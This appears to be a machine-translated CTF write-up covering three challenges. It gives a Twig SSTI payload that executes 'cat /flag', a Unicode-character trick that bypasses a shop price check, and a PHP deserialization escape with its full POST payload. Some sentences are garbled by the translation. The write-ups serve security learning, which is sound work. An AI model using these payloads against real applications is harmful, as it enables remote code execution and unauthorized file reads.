[BJDCTF2020]Cookie is so stable

hint Inside

Grab the bag and have a look

Guess it might be SSTI, But after trying a few commands

It won't , I saw the of other masters wp

payload：

{
   {_self.env.registerUndefinedFilterCallback("exec")}}{
   {_self.env.getFilter("cat /flag")}}

Reference resources ：https://blog.csdn.net/weixin_44477223/article/details/115673318

[ASIS 2019]Unicorn shop

Buy unicorns

I bought it several times but failed

But I type 10 When it's a dollar

Only one character is allowed

utf-8 Very important ...

So let me buy that expensive Unicorn with one character

https://www.compart.com/en/unicode/html

The bigger the better . search thousand Come out a pile of

This is big enough , One hundred thousand


0x Change it to a percent sign %E2%86%88

Here you go

[ An Xun Cup 2019]easy_serialize_php

Source code

<?php

$function = @$_GET['f'];

function filter($img){
    
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

phpinfo Prompt found in

That means we have to pass file_get_contents Read this file , Also is to let base64_decode($userinfo{[}^{\prime }im{g}^{\prime }])byd0g{3}_{f}1ag.php,alsoJustyesGive\; Way$userinfo[‘img’] by ZDBnM19mMWFnLnBocA==, and userinfo = Is deserialized serialize_info, and serialize_info Is the process of serialization filter The filter ${}_{S}ESSION,and$_SESSION Has been

if(!$_GET['img_path']){
    
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

initialization , Once the parameter is passed directly, it will be sha1

We noticed that extract($_POST); There are variable overrides , Direct to img Assignment doesn't work either , Because it is overwritten first , Execute the above code again

Come on, let's smooth it out , Now? _SESSION There are three elements

$_SESSION["user"] = 'guest';
$_SESSION['function'] = @$_GET['f'];
extract($_POST);// After this line, there are only two elements left , The above two elements will be overwritten . One of the remaining two elements is that we can use POST The control of the , One is the following img
$_SESSION['img']# Never mind what it is 

After that, they are serialized together , After deserialization img What should be （guest_img.png） Can't read the file we want

But! , Both of them will be filtered after being serialized , These filtered characters will be replaced with empty , and php Serialization has a feature

For example, the serialized string is shaped like

s:x:" Variable name ";s:x:" A variable's value ";..balabala

If the variable value is not enough, we will look for it later , Until the due x Stop at , Then we can use this feature to make img Replace with the value of （ The original img Your value is still , I just don't read you anymore , The previous value is enough ）

For example, we POST A value is added , After serialization, it will become

a:2:{s:x:" The variable name you passed ";s:x:" The variable value you passed ";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

Our initial idea is , You either have fewer variable names , Or the variable value becomes less （ Will be replaced with empty ）, If the variable value is less, he will continue to look for the following ";s:3:“img”;s:20:“L2QwZzNfZmxsbGxsbGFn”;} want , Then we won't be able to img Give us the value we want , So you can only get rid of the variable name you passed , Let the variable value after the variable name tube be a part of , Then the rest of the variable value can just be given to img assignment , After assigning values, the braces enclose , Behind you img How much love is .

We hope img How much is? ？ We want to put this value in the second half of the variable value part that we pass , I said before. , We hope img by ZDBnM19mMWFnLnBocA==, Then the second half should be in this format （\ It's used to separate the useless things in the back img）

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

For example, let's pass a flag=s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}

a:2:{s:4:"flag";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

filter After filtering, it becomes

a:2:{s:4:"";s:39:"s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

The name of the variable passed by us flag be without , So he had to go back and look 4 position , That is to say ";s:, But it is far from being read img, And we finally hope that the following

s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==

Will be treated as a variable independently , The previous part should also be a complete variable after filtering （ Including variable name and variable value , And don't forget to separate them with semicolons ）

initial payload as follows ,x We can modify it at will ,aa Represents two digits （s:3:“img”;s:20:"ZDBnM19mMWFnLnBocA== Ahead " ; Add it directly before the parameter value is transferred ）

a:2:{s:x:"";s:aa:"xxx...xx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

We just need

s:x:"";s:aa:"xxx...xx"

Become like

s:x:"name";s:x:"value"

Just look like , So we can call the first parameter ";s:aa:

In this case, the first one x The value is 7（ This x It is determined by the size of the name of the parameter we pass , So we spread phpflag that will do , Just for 7）

s:7:"";s:aa:"    xxx...xx"

So we just have to let xxx…xx become

;s:1:"1

Sum up , After splicing, it becomes （ Filtered , I added a space for the first variable ）

a:2:{s:7:"  ";s:aa:   ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

It should be before filtering

a:2:{s:7:"phpflag";s:aa:   ";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}\";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

therefore payload by (GET:?f=show_image)

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

（ No , I'm really convinced , Put the card away for another half day , I thought I had made a mistake , Results found payload Just like other masters , I wonder if it is the same as the last question Content-Type:application/x-www-form-urlencoded, Add , by the way ..... Ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah ah , What is this ）

/d0g3_fllllllag Conduct base64 encryption L2QwZzNfZmxsbGxsbGFn, Just replace the original one , Just like the number of digits

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

I'm impressed ...
oh , I saw the of other masters wp, Can be constructed with values , Just pass two parameters